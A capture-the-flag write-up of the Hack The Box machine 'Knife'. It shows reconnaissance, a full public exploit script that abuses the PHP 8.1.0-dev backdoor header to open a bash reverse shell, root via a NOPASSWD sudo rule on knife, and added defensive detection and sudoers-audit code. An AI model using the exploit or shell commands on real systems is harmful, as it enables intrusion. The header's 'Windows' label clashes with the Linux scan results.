# Knife

#### About this machine: HTB

Operating System: Windows

**Skills used**:

* PHP 8.1.0-DEV RCE
* Abusing Sudoers

Methodology:

We start with a first reconnaissance scan of all TCP ports:

```
❯ nmap -p- --open -sS -T4 -n -Pn 10.10.10.242 -oN First_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:29 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.95% done; ETC: 19:30 (0:00:03 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Now we run a script and version-detection scan against the open ports:

```
❯ nmap -p80,22 -sVC -sS -T4 -n -Pn 10.10.10.242 -oN sVC_Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:32 EDT
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We check what is running on port 80:

<figure><img src="/files/Y3RZQY1FQnC3uSHmqWyV" alt=""><figcaption><p>Web application running on port 80.</p></figcaption></figure>

<figure><img src="/files/mdx1UqlrpPaHI79qiXMZ" alt=""><figcaption><p>PHP 8.1.0-dev.</p></figcaption></figure>

We see it is an Apache server running PHP 8.1.0-dev.

We run Gobuster in directory enumeration mode but find nothing:

```
❯ gobuster dir -u "http://10.10.10.242/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.10.242/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
```

We search for exploits for PHP 8.1.0-dev and find one in particular. Checking the developer's profile, we find on their GitHub a Python script that gives us a reverse shell directly, so we download that one as well:

```
❯ searchsploit 8.1.0-dev

 Exploit Title                                        |  Path

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution  | php/webapps/49933.py
```

<figure><img src="/files/7EWPlZvt7qDtHbKXywoh" alt=""><figcaption><p>Repository we found that exploits the vulnerability in PHP 8.1.0-dev and gives us a reverse shell.</p></figcaption></figure>

We move the exploit into our working directory to run it:

```
❯ mv revshell_php_8.1.0-dev.py /home/guerrerove/HTB/machines/knife/exploit
```

What the exploit consists of:

```
#!/usr/bin/env python3
"""
Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
Exploit Author: flast101
Vendor Homepage: https://www.php.net/
Software Link:
    - https://hub.docker.com/r/phpdaily/php
    - https://github.com/phpdaily/php
Version: 8.1.0-dev
Tested on: Ubuntu 20.04
CVE : N/A
References:
    - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.

Usage:
    python3 revshell_php_8.1.0-dev.py url lhost lport
"""
import os, sys, argparse, requests

request = requests.Session()


def check_target(args):
    # Fingerprint the backdoored build from the response headers (X-Powered-By).
    response = request.get(args.url)
    for header in response.headers.items():
        if "PHP/8.1.0-dev" in header[1]:
            return True
    return False


def reverse_shell(args):
    # The backdoor evaluates the User-Agentt value that follows the "zerodium" marker.
    payload = 'bash -c "bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1"'
    injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects=False)


def main():
    parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp lport")
    parser.add_argument("url", metavar="url", help="Target URL")
    parser.add_argument("lhost", metavar="lhost", help="Attacker listening IP")
    parser.add_argument("lport", metavar="lport", help="Attacker listening port")
    args = parser.parse_args()
    if check_target(args):
        reverse_shell(args)
    else:
        print("Host is not available or vulnerable, aborting...")
        sys.exit(1)


if __name__ == "__main__":
    main()
```
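From the defender's side, the useful signal in the exploit above is the request itself: no legitimate client sends a `User-Agentt` header, and the backdoored build only fired when that value contained the `zerodium` marker, evaluating the rest of the value from byte 8 onward. The following triage helper is an added example, not part of this writeup or of flast101's script; the sample requests are constructed, and the `SKIP` offset is taken from the php-src commit referenced in the exploit header.

```python
from typing import Dict, List, Optional

MARKER = "zerodium"   # substring the backdoored build looked for in User-Agentt
SKIP = 8              # it handed the header value from byte 8 onward to eval


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Return the header block of a raw HTTP request as a lower-cased dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def classify(raw_request: str) -> Dict[str, Optional[str]]:
    """Triage one request as 'exploit', 'suspicious' or 'clean'.

    The header alone is suspicious (nobody sends it by accident); with the
    marker present we also recover the code the backdoor would have run,
    which is what an incident responder wants to see first.
    """
    value = parse_headers(raw_request).get("user-agentt")
    if value is None:
        return {"verdict": "clean", "evaluated_code": None}
    if MARKER in value:
        return {"verdict": "exploit", "evaluated_code": value[SKIP:]}
    return {"verdict": "suspicious", "evaluated_code": None}


# Constructed sample traffic: a normal request, a trigger shaped like the
# writeup's exploit, and a probe that only carries the odd header name.
SAMPLE_REQUESTS: List[str] = [
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nuser-agentt: probe\r\n\r\n",
]


def scan(requests: List[str]) -> List[str]:
    """One verdict per request, in input order."""
    return [classify(r)["verdict"] for r in requests]


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
```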

We run the script and set up our listener:

```
❯ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.51 443

❯ nc -nlvp 443

listening on [any] 443 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.242] 42898
bash: cannot set terminal process group (989): Inappropriate ioctl for device
bash: no job control in this shell

james@knife:/$
```

We have the reverse shell and we are in. Now we grab the first flag:

```
james@knife:/$ cd /home

james@knife:/home$ cd james

james@knife:~$ cat user.txt

bfdda457427a526151f71c62184a9321
```

We try to escalate privileges, first listing our id and what we are allowed to run with sudo:

```
james@knife:~$ id

uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User james may run the following commands on knife:

(root) NOPASSWD: /usr/bin/knife
```

We see that we can run the command /usr/bin/knife as root. This binary lets us spawn an interactive shell through the one-liner `sudo knife exec -E 'exec "/bin/sh"'`, so we run it:

```
james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'

whoami

root
```
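The sudoers entry is the whole privilege-escalation story here: a NOPASSWD rule for a binary that can run arbitrary code. The audit helper below is an added example, not part of this writeup; it parses the `sudo -l` output shown above (embedded as a constructed sample) and reports root-capable rules that need no password or name a known shell escape. The `SHELL_ESCAPES` table is an assumption limited to the one binary this writeup demonstrates.

```python
import os
import re
from typing import Dict, List

# Constructed from the sudo -l output shown in the writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Assumed table: binaries whose sudo use amounts to a root shell. Only the
# one used in this writeup is listed (knife exec -E evaluates arbitrary Ruby).
SHELL_ESCAPES = {"knife": "knife exec runs arbitrary Ruby, so it can spawn a shell"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Parse the rule lines after 'User X may run the following commands'."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = re.findall(r"[A-Z]+", m.group("tags"))   # e.g. NOPASSWD, SETENV
        for cmd in m.group("cmds").split(","):            # one rule per command
            rules.append({"runas": m.group("runas").strip(),
                          "tags": tags, "command": cmd.strip()})
    return rules


def find_risky(rules: List[Dict[str, object]]) -> List[str]:
    """Report root-capable rules that need no password or name a shell escape."""
    findings = []
    for r in rules:
        runas_user = str(r["runas"]).split(":")[0].strip()   # drop ":group"
        binary = os.path.basename(str(r["command"]).split()[0])
        as_root = runas_user in ("root", "ALL")
        nopasswd = "NOPASSWD" in r["tags"]
        if as_root and binary in SHELL_ESCAPES:
            suffix = " without a password" if nopasswd else ""
            findings.append(f"{r['command']}: {SHELL_ESCAPES[binary]}{suffix}")
        elif as_root and nopasswd:
            findings.append(f"{r['command']}: runs as root without a password")
    return findings
```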

We now have root access, so we locate the last flag:

```
cd /root

ls

delete.sh root.txt snap

cat root.txt

ed84828a0b7baf1d3c7a901152f08c47
```

We have the last flag and consider this machine finished.
